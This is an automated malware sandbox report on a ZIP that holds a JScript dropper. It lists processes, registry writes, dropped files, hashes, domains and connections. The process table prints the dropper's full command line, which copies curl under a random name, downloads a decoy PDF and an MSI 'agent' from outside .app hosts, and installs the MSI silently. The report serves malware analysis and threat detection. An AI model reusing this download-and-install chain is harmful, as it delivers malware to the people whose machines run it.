| File name: | 15708833671.zip |
| Full analysis: | https://app.any.run/tasks/53ff7b09-7377-4ece-a418-e6a0b022d6f3 |
| Verdict: | Malicious activity |
| Analysis date: | March 11, 2024, 16:44:02 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract, compression method=deflate |
| MD5: | 01AA1CDCCA115747B4FC76E528D1CE14 |
| SHA1: | 7782792972153C5C311FC054BF45B4590CB18998 |
| SHA256: | FDA09E43BF4D724775B58DE949A4A056E0C2FDBD17FA9C571B4D24AA1E5A1A50 |
| SSDEEP: | 96:jP/qXEACJIltTmczSpil88I7cp0KdMKhjkVukYwV7PN5:jRAlmcznS8+EddXCiwFl5 |
MALICIOUS
Opens a text file (SCRIPT)
- wscript.exe (PID: 1040)
Gets username (SCRIPT)
- wscript.exe (PID: 1040)
Accesses environment variables (SCRIPT)
- wscript.exe (PID: 1040)
Drops the executable file immediately after the start
- cmd.exe (PID: 3500)
SUSPICIOUS
Creates FileSystem object to access computer's file system (SCRIPT)
- wscript.exe (PID: 1040)
Gets full path of the running script (SCRIPT)
- wscript.exe (PID: 1040)
Checks whether a specific file exists (SCRIPT)
- wscript.exe (PID: 1040)
Reads data from a binary Stream object (SCRIPT)
- wscript.exe (PID: 1040)
Accesses current user name via WMI (SCRIPT)
- wscript.exe (PID: 1040)
Runs shell command (SCRIPT)
- wscript.exe (PID: 1040)
Reads the Internet Settings
- wscript.exe (PID: 1040)
Starts CMD.EXE for commands execution
- wscript.exe (PID: 1040)
Executable content was dropped or overwritten
- cmd.exe (PID: 3500)
The executable file from the user directory is run by the CMD process
- lMyupVxDHX.exe (PID: 1692)
- lMyupVxDHX.exe (PID: 3960)
INFO
Manual execution by a user
- wscript.exe (PID: 1040)
- explorer.exe (PID: 2292)
- wmpnscfg.exe (PID: 3352)
Dropped object may contain TOR URL's
- cmd.exe (PID: 3500)
Checks supported languages
- lMyupVxDHX.exe (PID: 1692)
- lMyupVxDHX.exe (PID: 3960)
- wmpnscfg.exe (PID: 3352)
Create files in a temporary directory
- lMyupVxDHX.exe (PID: 3960)
Reads the computer name
- lMyupVxDHX.exe (PID: 1692)
- lMyupVxDHX.exe (PID: 3960)
- wmpnscfg.exe (PID: 3352)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0009 |
| ZipCompression: | Deflated |
| ZipModifyDate: | 1980:00:00 00:00:00 |
| ZipCRC: | 0x538c5b58 |
| ZipCompressedSize: | 2205 |
| ZipUncompressedSize: | 3880 |
| ZipFileName: | 62137dc4c28872dfe6fb8dce17952984ffcfb90a9520b55709f775f7be297fd3 |
Total processes
50
Monitored processes
9
Malicious processes
1
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 492 | C:\Windows\system32\DllHost.exe /Processid:{4D111E08-CBF7-4F12-A926-2C7920AF52FC} | C:\Windows\System32\dllhost.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: COM Surrogate Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1040 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\a-skywaler-45678.js" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 1692 | lMyupVxDHX.exe -o "C:\Users\admin\Documents\ftaFQpZwvS.pdf" https://virginia.cookiesale.app/download/pdf | C:\Users\admin\AppData\Local\Temp\lMyupVxDHX.exe | cmd.exe | ||||||||||||
User: admin Company: curl, https://curl.se/ Integrity Level: MEDIUM Description: The curl executable Exit code: 0 Version: 8.5.0 Modules
| |||||||||||||||
| 2292 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2560 | C:\Windows\System32\msiexec.exe /i tbizAYZHaO.msi /qn | C:\Windows\System32\msiexec.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1620 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3352 | "C:\Program Files\Windows Media Player\wmpnscfg.exe" | C:\Program Files\Windows Media Player\wmpnscfg.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Network Sharing Service Configuration Application Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3500 | "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\admin\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe lMyupVxDHX.exe & lMyupVxDHX.exe -o "C:\Users\admin\Documents\ftaFQpZwvS.pdf" https://virginia.cookiesale.app/download/pdf & "C:\Users\admin\Documents\ftaFQpZwvS.pdf" & lMyupVxDHX.exe -o tbizAYZHaO.msi https://osaka.timebro.app/download/agent & C:\Windows\System32\msiexec.exe /i tbizAYZHaO.msi /qn | C:\Windows\System32\cmd.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1620 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3864 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\15708833671.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.91.0 Modules
| |||||||||||||||
| 3960 | lMyupVxDHX.exe -o tbizAYZHaO.msi https://osaka.timebro.app/download/agent | C:\Users\admin\AppData\Local\Temp\lMyupVxDHX.exe | cmd.exe | ||||||||||||
User: admin Company: curl, https://curl.se/ Integrity Level: MEDIUM Description: The curl executable Exit code: 0 Version: 8.5.0 Modules
| |||||||||||||||
Total events
4 281
Read events
4 250
Write events
31
Delete events
0
Modification events
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\15708833671.zip | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
Executable files
1
Suspicious files
0
Text files
1
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3500 | cmd.exe | C:\Users\admin\AppData\Local\Temp\lMyupVxDHX.exe | executable | |
MD5:3E54AFFFA30DB094DF4D6702AB0F956F | SHA256:DDCFDA5CDC4E22279C0A4E8E56F694FB34CB14495ADCA241FAB5B5BD6450C8A2 | |||
| 3864 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3864.44495\62137dc4c28872dfe6fb8dce17952984ffcfb90a9520b55709f775f7be297fd3 | text | |
MD5:81210A94B4AD978DEC0D6C302EA9CFD4 | SHA256:62137DC4C28872DFE6FB8DCE17952984FFCFB90A9520B55709F775F7BE297FD3 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
5
DNS requests
4
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | unknown |
1692 | lMyupVxDHX.exe | 49.13.77.253:443 | virginia.cookiesale.app | Hetzner Online GmbH | DE | unknown |
3960 | lMyupVxDHX.exe | 8.211.33.43:443 | osaka.timebro.app | Alibaba US Technology Co., Ltd. | DE | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
virginia.cookiesale.app |
| unknown |
dns.msftncsi.com |
| shared |
osaka.timebro.app |
| unknown |